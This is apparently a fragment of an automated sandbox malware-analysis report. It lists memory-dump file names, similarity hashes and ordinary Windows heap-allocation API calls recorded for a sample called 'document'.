                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFreeH_prologHeapRaise__lock
                                                                  • String ID: hB$string too long
                                                                  • API String ID: 2277933175-4162919455
                                                                  • Opcode ID: 500f2fd8ebba751ca1f3013d6e9013b7e826199f8acec9835136d86677b485bb
                                                                  • Instruction ID: a0063198a6ad5418a60f27aa6fdeb6e5ae7cc0c3ac2dcd9628e5fcf86c67384a
                                                                  • Opcode Fuzzy Hash: 500f2fd8ebba751ca1f3013d6e9013b7e826199f8acec9835136d86677b485bb
                                                                  • Instruction Fuzzy Hash: 3EF08271B00138EAC700FBE5E90979D7774AF04319FE4416FE00165195CBFD5545CA5D
                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,?,00000000,00428E3C,00000000,?,00000000), ref: 00428872
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00428E3C,00000000,?,00000000), ref: 004288AB
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004288C9
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004288E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  • Opcode ID: 4826cc8e5656ae35a018f652000ba19a5e3c76ade9028320e3ddbe3c001d3ea1
                                                                  • Instruction ID: 72779762a505b3105af33e06486f7e26f074df3cc48a41ce57bbcb179b6b58b0
                                                                  • Opcode Fuzzy Hash: 4826cc8e5656ae35a018f652000ba19a5e3c76ade9028320e3ddbe3c001d3ea1
                                                                  • Instruction Fuzzy Hash: 11116D303002119FD735AF19FC46926BBF1FB91366790563EF152C62B0C771A952CB08